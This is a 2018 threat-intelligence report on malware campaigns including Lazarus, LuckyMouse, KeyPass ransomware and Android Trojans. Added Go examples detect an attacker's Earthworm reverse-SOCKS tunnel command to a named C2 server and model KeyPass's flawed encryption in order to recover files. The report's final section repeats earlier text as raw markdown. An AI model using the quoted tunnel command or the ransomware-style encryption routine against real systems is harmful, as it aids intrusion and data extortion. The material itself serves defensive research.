ID SECURELIST:CB1C16F5005991911A147024EB899D0A Type securelist Reporter David Emm Modified 2018-11-12T10:00:24
Description
Targeted attacks and malware campaigns
Lazarus targets cryptocurrency exchange
Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global cryptocurrency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized cryptocurrency trading application that had been recommended to the company over email.
An unsuspecting employee had downloaded a third-party application from a legitimate-looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again.
It seems as though Lazarus has found an elaborate way to create a legitimate-looking site and inject a malicious payload into a 'legitimate-looking' software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack.
The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we've seen this APT group using malware for Mac OS. It would seem that in the chase after advanced users, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms.
This campaign should be a lesson to all of us and a warning to businesses relying on third-party software. Do not automatically trust the code running on your systems. Neither a good-looking website, nor a solid company profile, nor digital certificates guarantee the absence of backdoors. Trust has to be earned and proven.
LuckyMouse
Since March 2018, we have found several infections where a previously unknown Trojan was injected into the 'lsass.exe' system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT.
The campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. We believe that the Chinese-speaking threat actor LuckyMouse is responsible for this campaign. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers ("-s rssocks -d 103.75.190[.]28 -e 443") creates a tunnel to a previously known LuckyMouse command-and-control (C2) server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor.
The malware consists of three modules: a custom C++ installer, the NDISProxy network filtering driver and a C++ Trojan.
We have not seen any indications of spear phishing or watering hole activity. We think the attackers spread their infectors through networks that were already compromised.
The Trojan is a full-featured RAT capable of executing common tasks such as command execution, and downloading and uploading files. The attackers use it to gather a target's data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler. This tool is publicly available and is popular among Chinese-speaking actors. Given that the Trojan is an HTTPS server itself, we believe that the SOCKS tunnel is used for targets without an external IP, so that the C2 is able to send commands.
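The tunnel command quoted above has a recognisable shape on the endpoint: a process asking for the Earthworm reverse SOCKS mode together with a destination host and port. The following detection routine is an added example, not code from the report; it runs over a constructed process-creation log in an invented key=value layout, matches only the "-s rssocks -d <host> -e <port>" shape the report describes, and raises severity when the destination is the C2 address the report names.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// TunnelFinding is one process command line that matches the reverse SOCKS
// shape reported in the campaign.
type TunnelFinding struct {
	Host    string // destination host passed with -d
	Port    string // destination port passed with -e
	KnownC2 bool   // destination matches the report's published C2 address
	Line    string // the raw log line, kept for the analyst
}

// Option patterns for the "-s rssocks -d <host> -e <port>" shape. Option order
// is not assumed; each option is located independently in the command line.
var (
	modeRe = regexp.MustCompile(`(?:^|\s)-s\s+(\w+)`)
	hostRe = regexp.MustCompile(`(?:^|\s)-d\s+([\w.-]+)`)
	portRe = regexp.MustCompile(`(?:^|\s)-e\s+(\d{1,5})\b`)
)

// knownC2 holds the C2 address named in the report (refanged). Extend it from
// your own threat intelligence feed.
var knownC2 = map[string]bool{"103.75.190.28": true}

// inspectCommandLine returns a finding when the command line requests the
// rssocks (reverse SOCKS) mode together with a destination host and port.
func inspectCommandLine(line string) (TunnelFinding, bool) {
	m := modeRe.FindStringSubmatch(line)
	if m == nil || m[1] != "rssocks" {
		return TunnelFinding{}, false
	}
	h := hostRe.FindStringSubmatch(line)
	p := portRe.FindStringSubmatch(line)
	if h == nil || p == nil {
		return TunnelFinding{}, false
	}
	return TunnelFinding{Host: h[1], Port: p[1], KnownC2: knownC2[h[1]], Line: line}, true
}

// scanProcessLog runs inspectCommandLine over every log line and collects hits.
func scanProcessLog(lines []string) []TunnelFinding {
	var out []TunnelFinding
	for _, l := range lines {
		if f, ok := inspectCommandLine(l); ok {
			out = append(out, f)
		}
	}
	return out
}

// sampleLog is a constructed process-creation log; the binary names, host
// names and timestamps are invented for this example and are not from the report.
var sampleLog = []string{
	`ts=2018-09-07T10:12:03Z host=WS-17 user=svc_backup cmd="C:\Windows\Temp\ew.exe -s rssocks -d 103.75.190.28 -e 443"`,
	`ts=2018-09-07T10:12:09Z host=WS-17 user=svc_backup cmd="ssh -N -D 1080 ops@jump.example"`,
	`ts=2018-09-07T10:13:41Z host=WS-22 user=jdoe cmd="sort -s -d input.txt"`,
	`ts=2018-09-07T10:15:00Z host=WS-22 user=jdoe cmd="svc.exe -e 443 -s rssocks -d relay.example"`,
}

func main() {
	for _, f := range scanProcessLog(sampleLog) {
		sev := "medium"
		if f.KnownC2 {
			sev = "high" // destination is a published C2 address
		}
		fmt.Printf("[%s] reverse SOCKS tunnel to %s:%s\n  %s\n", strings.ToUpper(sev), f.Host, f.Port, f.Line)
	}
}
```

The second hit shows why the rule keys on the option shape rather than the binary name: the same request from a renamed executable towards an unknown relay still surfaces, only at a lower severity.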
Financial fraud on an industrial scale
Usually, attacks on industrial enterprises are associated with cyber-espionage or sabotage. However, we recently discovered a phishing campaign designed to steal money from such organizations – primarily manufacturing companies.
The attackers use standard phishing techniques to lure their victims into clicking on infected attachments, using emails disguised as commercial offers and other financial documents. The criminals use legitimate remote administration applications – either TeamViewer or RMS (Remote Manipulator System). These programs are used to gain access to the device and then to scan it for information on current purchases and for financial and accounting software. The attackers then use different ploys to steal company money – for example, by replacing the banking details in transactions. At the time we published our report, on August 1, we had seen infections on around 800 computers, spread across at least 400 organizations in a wide array of industries – including manufacturing, oil and gas, metallurgy, engineering, energy, construction, mining and logistics. The campaign has been ongoing since October 2017.
Our research highlights that even when threat actors use simple techniques and known malware they can successfully attack industrial companies by using social engineering tricks and hiding their code in target systems – using legitimate remote administration software to evade detection by antivirus solutions. Remote administration capabilities give criminals full control of compromised systems, so possible attack scenarios are not limited to the theft of money. In the process of attacking their targets, the attackers steal sensitive data belonging to target organizations, their partners and customers, carry out surreptitious video surveillance of company employees and record audio and video using devices connected to infected machines. While the series of attacks targets primarily Russian organizations, the same tactics and tools could be successfully used in attacks against industrial companies anywhere.
You can find out more about how attackers use remote administration tools to compromise their targets here, and an overview of attacks on ICS systems in the first half of 2018 here.
Malware stories
Exploiting the digital gold rush
For some time now, we've been tracking a dramatic decline in ransomware and a massive growth in cryptocurrency mining. The number of people who encountered miners grew from 1,899,236 in 2016-17 to 2,735,611 in 2017-18. This is clearly because it's a lucrative activity for cybercriminals – we estimate that mining botnets generated more than $7,000,000 in the second half of 2017. Not only are we seeing purpose-built cryptocurrency miners, we're also seeing existing malware adding this functionality to their arsenal.
The ransomware Trojan Rakhni is a case in point. The malware loader chooses which component to install depending on the device. The malware, which we have seen in Russia, Kazakhstan, Ukraine, Germany and India, is distributed through spam mailings with malicious attachments. One of the samples we analysed masquerades as a financial document. When loaded, this appears to be a document viewer. The malware displays an error message explaining why nothing has opened. It then disables Windows Defender and installs forged digital certificates.
The malware checks to see if there are Bitcoin-related folders on the computer. If there are, it encrypts files and demands a ransom. If not, it installs a cryptocurrency miner. Finally, the malware tries to spread to other computers within the network. You can read our analysis of Rakhni here.
Cybercriminals don't just use malware to cash in on the growing interest in cryptocurrencies; they also use established social engineering techniques to trick people out of their digital money. This includes sending links to phishing scams that mimic the authorization pages of popular crypto exchanges, to trick their victims into giving the scammers access to their crypto exchange account – and their money. In the first half of 2018, we saw 100,000 of these attempts to redirect people to such fake pages.
The same approach is used to gain access to online wallets, where the 'hook' is a warning that the victim will lose money if they don't go through a formal identification process – the attackers, of course, harvest the details entered by the victim. This method works just as well where the victim is using an offline wallet stored on their computer.
Scammers also try to use the speculation around cryptocurrencies to trick people who don't have a wallet: they lure them to fake crypto wallet sites, promising registration bonuses, including cryptocurrency. In some cases, they harvest personal data and redirect the victim to a legitimate site. In others, they open a real wallet for the victim, which is compromised from the outset. Online wallets and exchanges aren't the only focus of the scammers; we have also seen spoof versions of services designed to facilitate transactions with digital coins stored on the victim's computer.
We recently discovered a cryptocurrency miner, named PowerGhost, focused mainly on workstations and servers inside corporate networks – thereby hoping to commandeer the power of multiple processors in one fell swoop. It's not uncommon to see cybercriminals infect clean software with a malicious miner to promote the spread of their malware. However, the creators of PowerGhost went further, using fileless methods to establish it in a compromised network. PowerGhost tries to log in to network user accounts using WMI (Windows Management Instrumentation), obtaining logins and passwords using the Mimikatz data extraction tool. The malware can also be distributed using the EternalBlue exploit (used last year in the WannaCry and ExPetr outbreaks). Once a device has been infected, PowerGhost tries to enhance its privileges using operating system vulnerabilities. Most of the attacks we've seen so far have been in India, Turkey, Brazil and Colombia.
KeyPass ransomware
The number of ransomware attacks has been declining in the last year or so. Nevertheless, this type of malware remains a problem and we continue to see the development of new ransomware families. Early in August, our anti-ransomware module started detecting the 'KeyPass' Trojan. In just two days, we found this malware in more than 20 countries – Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East.
We believe that the criminals behind KeyPass use fake installers that download the malware.
KeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files located in directories that are hardcoded in the malware. Encrypted files are given the additional extension 'KEYPASS', and ransom notes called '!!!KEYPASS_DECRYPTION_INFO!!!.txt' are saved in each directory containing encrypted files.
The creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file.
Shortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the JSON format. If the C2 is unavailable – for example, the infected computer is not connected to the internet, or the server is down – the malware uses a hardcoded key and ID. As a result, in the case of offline encryption, decryption of the victim's files will be trivial.
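Two consequences of the scheme described above are worth seeing concretely: a fixed fallback key makes every offline-encrypted file recoverable, and a zero IV shared across files lets the first 16 bytes of one file be recovered from the first 16 bytes of another without any key. The code below is an added model of the scheme for responders, not the Trojan's code or the report's; the key, file contents and header strings are constructed for the example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

// keyPassLimit mirrors the cap described in the report: only the first
// 0x500000 bytes of a file are encrypted, the rest is left untouched.
const keyPassLimit = 0x500000

// demoKey stands in for the hardcoded 32-byte fallback key the Trojan uses
// when its C2 cannot be reached. The value here is constructed for the example.
var demoKey = []byte("0123456789abcdef0123456789abcdef")

// zeroIV is the all-zero initialization vector the scheme uses for every file.
var zeroIV = make([]byte, aes.BlockSize)

// encryptKeyPassStyle models the scheme as described: AES-256 in CFB mode, a
// zero IV and one key for all files, applied to at most keyPassLimit bytes.
func encryptKeyPassStyle(key, plain []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	n := len(plain)
	if n > keyPassLimit {
		n = keyPassLimit
	}
	out := make([]byte, len(plain))
	cipher.NewCFBEncrypter(block, zeroIV).XORKeyStream(out[:n], plain[:n])
	copy(out[n:], plain[n:]) // the tail beyond the cap stays plaintext
	return out, nil
}

// decryptKeyPassStyle is the inverse. With the offline fallback key fixed in
// the binary, a responder who has recovered it can restore every file that
// was encrypted while the C2 was unreachable.
func decryptKeyPassStyle(key, enc []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	n := len(enc)
	if n > keyPassLimit {
		n = keyPassLimit
	}
	out := make([]byte, len(enc))
	cipher.NewCFBDecrypter(block, zeroIV).XORKeyStream(out[:n], enc[:n])
	copy(out[n:], enc[n:])
	return out, nil
}

// xorBlocks returns a XOR b over the first aes.BlockSize bytes.
func xorBlocks(a, b []byte) []byte {
	x := make([]byte, aes.BlockSize)
	for i := range x {
		x[i] = a[i] ^ b[i]
	}
	return x
}

// recoverFirstBlock shows the second weakness. In CFB the first ciphertext
// block is P1 XOR E_K(IV); with one key and a zero IV that E_K(IV) is the same
// for every file, so C1a XOR C1b = P1a XOR P1b. Knowing the first 16 bytes of
// one file (a format header such as "%PDF-1.7") reveals those of any other.
func recoverFirstBlock(knownPlain, knownCipher, targetCipher []byte) []byte {
	return xorBlocks(xorBlocks(knownCipher, targetCipher), knownPlain)
}

func main() {
	a := []byte("%PDF-1.7 constructed invoice, nothing sensitive here")
	b := []byte("%PDF-1.4 constructed contract, also a sample file")
	ca, _ := encryptKeyPassStyle(demoKey, a)
	cb, _ := encryptKeyPassStyle(demoKey, b)

	dec, _ := decryptKeyPassStyle(demoKey, ca)
	fmt.Println("round trip with the fixed key ok:", bytes.Equal(dec, a))

	guess := recoverFirstBlock(a[:aes.BlockSize], ca, cb)
	fmt.Printf("first block of b recovered without the key: %q\n", guess)
}
```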
Probably the most interesting feature of the KeyPass Trojan is its ability to take 'manual control'. The Trojan contains a form that is hidden by default, but which can be shown after pressing a special button on the keyboard. This form allows the criminals to customize the encryption process by changing such parameters as the encryption key, the name of the ransom note, the text of the ransom, the victim ID, the extension of encrypted files and the list of directories to be excluded from encryption. This capability suggests that the criminals behind the Trojan might intend to use it in manual attacks.
Sextortion with a twist
Scams come in many forms, but the people behind them are always on the lookout for ways to lend credibility to the scam and maximise their opportunity to make money. One recent 'sextortion' scam uses stolen passwords for this purpose. The victim receives an email message claiming that their computer has been compromised and that the attacker has recorded a video of them watching pornographic material. The attackers threaten to send a copy of the video to the victim's contacts unless they pay a ransom within 24 hours. The ransom demand is $1,400, payable in bitcoins.
The scammer includes a legitimate password in the message, in a bid to convince the victim that they have indeed been compromised. It seems that the passwords used are real, although in some cases at least they are very old. The passwords were probably obtained in an underground market and came from an earlier data breach.
The hunt for corporate passwords
It's not just individuals who are targeted by phishing attacks – starting from early July, we saw malicious spam activity targeting corporate mailboxes. The messages contained an attachment with an .ISO extension that we detect as Loki Bot. The objective of the malware is to steal passwords from browsers, messaging applications, mail and FTP clients, and cryptocurrency wallets, and then to forward the data to the criminals behind the attacks.
The messages are diverse in nature. They include fake notifications from well-known companies, or fake orders or offers.
The scammers pass off malicious files as financial documents: invoices, transfers, payments, etc. This is a fairly popular malicious spamming technique, with the message body usually consisting of no more than a few lines and the subject mentioning the fake attachment.
Each year we see an increase in spam attacks on the corporate sector aimed at obtaining confidential corporate information: intellectual property, authentication data, databases, bank accounts, etc. That's why it's essential for corporate security strategy to include both technical protection and staff education – to stop them becoming the entry-point for a cyberattack.
Botnets: the big picture
Spam mailshots with links to malware, and bots downloading other malware, are just two botnet deployment scenarios. The choice of payload is limited only by the imagination of the botnet operator or their customers. It might be ransomware, a banker, a miner, a backdoor, etc. Every day we intercept numerous file download commands sent to bots of various types and families. We recently presented the results of our analysis of botnet activity for H2 2017 and H1 2018.
Here are the main trends that we identified by analyzing the files downloaded by bots:
The share of miners in bot-distributed files is increasing, as cybercriminals have begun to view botnets as a tool for cryptocurrency mining.
The number of downloaded droppers is also on the rise, reflecting the fact that attacks are multi-stage and growing in complexity.
The share of banking Trojans among bot-downloaded files in 2018 decreased, but it's too soon to speak of an overall reduction in number, since they are often delivered by droppers.
Increasingly, botnets are leased according to the needs of the customer, so in many cases it is difficult to pinpoint the 'specialization' of the botnet.
Using USB devices to spread malware
USB devices, which have been around for almost 20 years, offer an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors – most notably in the case of the state-sponsored threat Stuxnet, which used USB devices to inject malware into the network of an Iranian nuclear facility.
These days the use of USB devices as a business tool is declining, and there is greater awareness of the security risks associated with them. Nevertheless, millions of USB devices are still produced for use at home, in businesses and in marketing promotion campaigns such as trade show giveaways. So they remain a target for attackers.
Kaspersky Lab data for 2017 showed that one in four people worldwide were affected by a local cyber-incident, i.e. one not related to the internet. These attacks are detected directly on a victim's computer and include infections caused by removable media such as USB devices.
USB devices and other removable media have been used to spread cryptocurrency mining software since at least 2015. Some victims were found to have been carrying the infection for years.
The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.
Every tenth person infected via removable media in 2018 was targeted with this cryptocurrency miner: around 9.22% – up from 6.7% in 2017 and 4.2% in 2016.
Other malware spread through removable media includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.
The Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.
Emerging markets are the most vulnerable to malicious infection spread by removable media – with Asia, Africa and South America among the most affected – but isolated hits were also detected in countries in Europe and North America.
Dark Tequila, a complex banking malware reported in August 2018, has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.
New trends in the world of IoT threats
The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world's population several times over. Yet manufacturers still don't prioritize security: there are no reminders to change the default password during initial setup or notifications about the release of new firmware versions, and the updating process itself can be complex for the average consumer. This makes IoT devices a prime target for cybercriminals. Easier to infect than PCs, they often play an important role in the home infrastructure: some manage internet traffic, others shoot video footage and still others control domestic devices – for example, air conditioning.
Malware for smart devices is increasing not only in quantity but also quality. More and more exploits are being weaponized by cybercriminals, and infected devices are used to launch DDoS attacks, to steal personal data and to mine cryptocurrency.
You can read our report on IoT threats here, including tips on how to reduce the risk of smart devices being infected.
A look at the Asacub mobile banking Trojan
The first version of Asacub, which we saw in June 2015, was a basic phishing app: it was able to send a list of the victim's apps, browser history and contact list to a remote C2 server, send SMS messages to a specific phone number and turn off the screen on demand. This mobile Trojan has evolved since then, off the back of a large-scale distribution campaign by its creators in spring and summer 2017, helping it to claim top spot in last year's ranking of mobile banking Trojans – out-performing other families such as Svpeng and Faketoken. The Trojan has claimed victims in a number of countries, but the latest version steals money from owners of Android devices connected to the mobile banking service of one of Russia's largest banks.
The malware is spread via SMS messages containing a link and an offer to view a photo or MMS message. The link directs the victim to a web page containing a similar sentence and a button for downloading the Trojan APK file to the device.
Asacub masquerades as an MMS app or a client of a popular free ads service.
Once installed, the Trojan starts to communicate with the C2 server. Data is transferred in JSON format and includes information about the victim's device – smartphone model, operating system, mobile operator and Trojan version.
Asacub is able to withdraw funds from a bank card linked to the phone by sending an SMS for the transfer of funds to another account using the number of the card or mobile phone. Moreover, the Trojan intercepts SMS messages from the bank that contain one-time passwords and information about the balance of the linked bank card. Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS messages and send them to the required number. What's more, the victim can't subsequently check the balance via mobile banking or change any settings, because after receiving a command with the code 40, the Trojan prevents the banking app from running on the phone.
Early in 2018, our mobile intruder detection technology was triggered by a suspicious Android sample that turned out to belong to a new spyware family that we named BusyGasper. The malware isn't sophisticated, but it does demonstrate some unusual features for this type of threat. BusyGasper is a unique spy implant with stand-out features such as device sensor listeners, including motion detectors that have been implemented with a degree of originality. It has an incredibly wide-ranging protocol – about 100 commands – and an ability to bypass the Doze battery saver. Like other modern Android spyware, it is capable of exfiltrating data from messaging applications – WhatsApp, Viber and Facebook. It also includes some keylogging tools – the malware processes every user tap, gathering its co-ordinates and calculating characters by matching given values with hardcoded ones.
The malware has a multi-component structure and can download a payload or updates from its C2 server, which happens to be an FTP server belonging to the free Russian web hosting service Ucoz. It is noteworthy that BusyGasper supports the IRC protocol, which is rarely seen among Android malware. In addition, it can log in to the attacker's email inbox, parse emails in a special folder for commands and save any payloads to a device from email attachments.
There is a hidden menu for controlling the different implants that seems to have been created for manual operator control. To activate the menu, the operator needs to call the hardcoded number 9909 from an infected device.
The operator can use this interface to type any command. It also shows a current malware log.
This particular operation has been active since May. We have found no evidence of spear phishing or other common infection methods. Some clues, such as the existence of the hidden menu mentioned above, suggest a manual installation method – the attackers gaining physical access to a victim's device in order to install the malware. This would explain the number of victims – fewer than 10 in total, all located in Russia. There are no similarities to commercial spyware products or to other known spyware variants, which suggests that BusyGasper is self-developed and used by a single threat actor. At the same time, the lack of encryption, the use of a public FTP server and the low OPSEC level could indicate that less skilled attackers are behind the malware.
Thinking outside the [sand]box
One of the security principles built into the Android operating system is that all apps must be isolated from one another. Each app, along with its private files, operates in a 'sandbox' that can't be accessed by other apps. The point is to ensure that, even if a malicious app infiltrates your device, it's unable to access data held by legitimate apps – for example, the username and password for your online banking app, or your message history. Unsurprisingly, hackers try to find ways to circumvent this protection mechanism.
In August, at DEF CON 26, Check Point researcher Slava Makkaveev discussed a new way of escaping the Android sandbox, dubbed a 'Man-in-the-Disk' attack.
Android also has a shared external storage, named External Storage. Apps must ask the device owner for permission to access this storage area – the privileges required are not normally considered dangerous, and nearly every app asks for them, so there is nothing suspicious about the request per se. External storage is used for lots of useful things, such as to exchange files or transfer files between a smartphone and a computer. However, external storage is also often used for temporarily storing data downloaded from the internet. The data is first written to the shared part of the disk, and then transferred to an isolated area that only that particular app can access. For example, an app may temporarily use the area to store supplementary modules that it installs to expand its functionality, additional content such as dictionaries, or updates.
The problem is that any app with read/write access to the external storage can gain access to the files and modify them, adding something malicious. In a real-life scenario, you may install a seemingly harmless app, such as a game, that may nevertheless infect your smartphone with malware. Slava Makkaveev gave several examples in his DEF CON presentation.
Google researchers discovered that the same method of attack could be applied to the Android version of the popular game, Fortnite. To download the game, players need to install a helper app first, and it is supposed to download the game files. However, using the Man-in-the-Disk attack, someone can trick the helper into installing a malicious app. Fortnite developers – Epic Games – have already issued a new version of the installer. So, if you're a Fortnite player, use version 2.1.0 or later to be sure that you're safe. If you have Fortnite already installed, uninstall it and then reinstall it from scratch using the new version.
How safe are car sharing apps?
There has been a growth in car sharing services in recent years. Such services clearly provide flexibility for people wanting to get around major cities. However, this raises the question of security – how safe is the personal information of people using these services?
The obvious reason why cybercriminals might be interested in car sharing is because they want to ride in someone's car at someone else's expense. But this could be the least likely scenario – it's a crime that requires a physical point of presence and there are ways to cross check if the person who makes the booking is the one who gets the ride. The selling of hijacked accounts might be a more viable reason – driven by demand from those who don't have a driving license or who have been refused registration by the car sharing service's security team. Offers of this nature already exist on the market. In addition, if someone manages to hijack someone else's car sharing account, they can track all their trips and steal things that are left behind in the car. Finally, a car that is fraudulently rented in somebody else's name can always be driven to some remote place and cannibalized for spare parts, or used for criminal activity.
We tested 13 apps to see if their developers have considered security.
First, we checked to see if the apps could be launched on an Android device with root privileges and to see how well the code is obfuscated. This is important because most Android apps can be decompiled, their code modified (for example, so that user credentials are sent to a C2 server), then re-assembled, signed with a new certificate and uploaded again to an app store. An attacker on a rooted device can infiltrate the app's process and gain access to authentication data.
Second, we checked to see if it was possible to create a username and password when using a service. Many services use a person's phone number as their username. This is quite easy for cybercriminals to obtain as people often forget to hide it on social media, while car sharing customers can be identified on social media by their hashtags and photos.
Third, we looked at how the apps work with certificates and if cybercriminals have any chance of launching successful Man-in-the-Middle attacks. We also checked how easy it is to overlay an app's interface with a fake authorization window.
The results of our tests were not encouraging. It's clear that app developers don't fully understand the current threats to mobile platforms – this is true for both the design stage and when creating the infrastructure. A good first step would be to expand the functionality for notifying customers of suspicious activities – only one service currently sends notifications to customers about attempts to log in to their account from a different device. The majority of the apps we analysed are poorly designed from a security standpoint and need to be improved. Moreover, many of the programs are not only very similar to each other but are actually based on the same code.
You can read our report here, including advice for customers of car sharing services and recommendations for developers of car sharing apps.
While the series of attacks targets primarily Russian organizations, the same tactics and tools could be successfully used in attacks against industrial companies anywhere.\n\nYou can find out more about how attackers use remote administration tools to compromise their targets [here](<https://securelist.com/threats-posed-by-using-rats-in-ics/88011/>), and an overview of attacks on ICS systems in the first half of 2018 [here](<https://securelist.com/threat-landscape-for-industrial-automation-systems-in-h1-2018/87913/>).\n\n## Malware stories\n\n### Exploiting the digital gold rush\n\nFor some time now, we've been tracking [a dramatic decline in ransomware and a massive growth in cryptocurrency mining](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>). The number of people who encountered miners grew from 1,899,236 in 2016-17 to 2,735,611 in 2017-18. This is clearly because it's a lucrative activity for cybercriminals \u2013 we estimate that mining botnets generated more than $7,000,000 in the second half of 2017. Not only are we seeing purpose-built cryptocurrency miners, we're also seeing existing malware adding this functionality to their arsenal.\n\nThe ransomware Trojan Rakhni is a case in point. The malware loader chooses which component to install depending on the device. The malware, which we have seen in Russia, Kazakhstan, Ukraine, Germany and India, is distributed through spam mailings with malicious attachments. One of the samples we analysed masquerades as a financial document. When loaded, this appears to be a document viewer. The malware displays an error message explaining why nothing has opened. 
It then disables Windows Defender and installs forged digital certificates.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/02104541/180702-rakhni-6.png>) \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/02104545/180702-rakhni-7.png>)\n\nThe malware checks to see if there are Bitcoin-related folders on the computer. If there are, it encrypts files and demands a ransom. If not, it installs a cryptocurrency miner. Finally, the malware tries to spread to other computers within the network. You can read our analysis of Rakhni [here](<https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/>).\n\nCybercriminals don't just use malware to cash in on the growing interest in cryptocurrencies; they also use established social engineering techniques to [trick people out of their digital money](<https://securelist.com/in-cryptoland-trust-can-be-costly/86367/>). This includes sending links to phishing scams that mimic the authorization pages of popular crypto exchanges, to trick their victims into giving the scammers access to their crypto exchange account \u2013 and their money. In the first half of 2018, we saw 100,000 of these attempts to redirect people to such fake pages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/06154305/180706-cryptoscam-1.png>)\n\nThe same approach is used to gain access to online wallets, where the 'hook' is a warning that the victim will lose money if they don't go through a formal identification process \u2013 the attackers, of course, harvest the details entered by the victim. This method works just as well where the victim is using an offline wallet stored on their computer.\n\nScammers also try to use the speculation around cryptocurrencies to trick people who don't have a wallet: they lure them to fake crypto wallet sites, promising registration bonuses, including cryptocurrency. 
In some cases, they harvest personal data and redirect the victim to a legitimate site. In others, they open a real wallet for the victim, which is compromised from the outset. Online wallets and exchanges aren't the only focus of the scammers; we have also seen spoof versions of services designed to facilitate transactions with digital coins stored on the victim's computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/06154304/180706-cryptoscam-6.png>)\n\nEarlier this year, we provided some [advice on choosing a crypto wallet](<https://www.kaspersky.com/blog/cryptowallets/22025/>).\n\nWe recently discovered a cryptocurrency miner, named [PowerGhost](<https://securelist.com/a-mining-multitool/86950/>), focused mainly on workstations and servers inside corporate networks \u2013 thereby hoping to commandeer the power of multiple processors in one fell swoop. It's not uncommon to see cybercriminals infect clean software with a malicious miner to promote the spread of their malware. However, the creators of PowerGhost went further, using fileless methods to establish it in a compromised network. PowerGhost tries to log in to network user accounts using WMI (Windows Management Instrumentation), obtaining logins and passwords using the Mimikatz data extraction tool. The malware can also be distributed using the EternalBlue exploit (used last year in the WannaCry and ExPetr outbreaks). Once a device has been infected, PowerGhost tries to enhance its privileges using operating system vulnerabilities. Most of the attacks we've seen so far have been in India, Turkey, Brazil and Colombia.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/25133320/180725-miner-powershell-7.png>)\n\n### KeyPass ransomware\n\nThe number of ransomware attacks has been declining in the last year or so. Nevertheless, this type of malware remains a problem and we continue to see the development of new ransomware families. 
Early in August, our [anti-ransomware module](<https://www.kaspersky.com/enterprise-security/wiki-section/products/ransomware-protection>) started detecting the '[KeyPass](<https://securelist.com/keypass-ransomware/87412/>)' Trojan. In just two days, we found this malware in more than 20 countries \u2013 Brazil and Vietnam were hardest hit, but we also found victims in Europe, Africa and the Far East.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/13120501/180813-keypass-12.png>)\n\nWe believe that the criminals behind KeyPass use fake installers that download the malware.\n\nKeyPass encrypts all files, regardless of extension, on local drives and network shares that are accessible from the infected computer. It ignores some files located in directories that are hardcoded in the malware. Encrypted files are given the additional extension 'KEYPASS', and ransom notes called '!!!KEYPASS_DECRYPTION_INFO!!!.txt' are saved in each directory containing encrypted files.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/13103319/180813-keypass-5.png>)\n\nThe creators of this Trojan implemented a very simplistic scheme. The malware uses the symmetric algorithm AES-256 in CFB mode with zero IV and the same 32-byte key for all files. The Trojan encrypts a maximum of 0x500000 bytes (~5 MB) of data at the start of each file.\n\nShortly after launch, the malware connects to its C2 server and obtains the encryption key and infection ID for the current victim. The data is transferred over plain HTTP in the [JSON](<https://en.wikipedia.org/wiki/JSON>) format. If the C2 is unavailable \u2013 for example, the infected computer is not connected to the internet, or the server is down \u2013 the malware uses a hardcoded key and ID. 
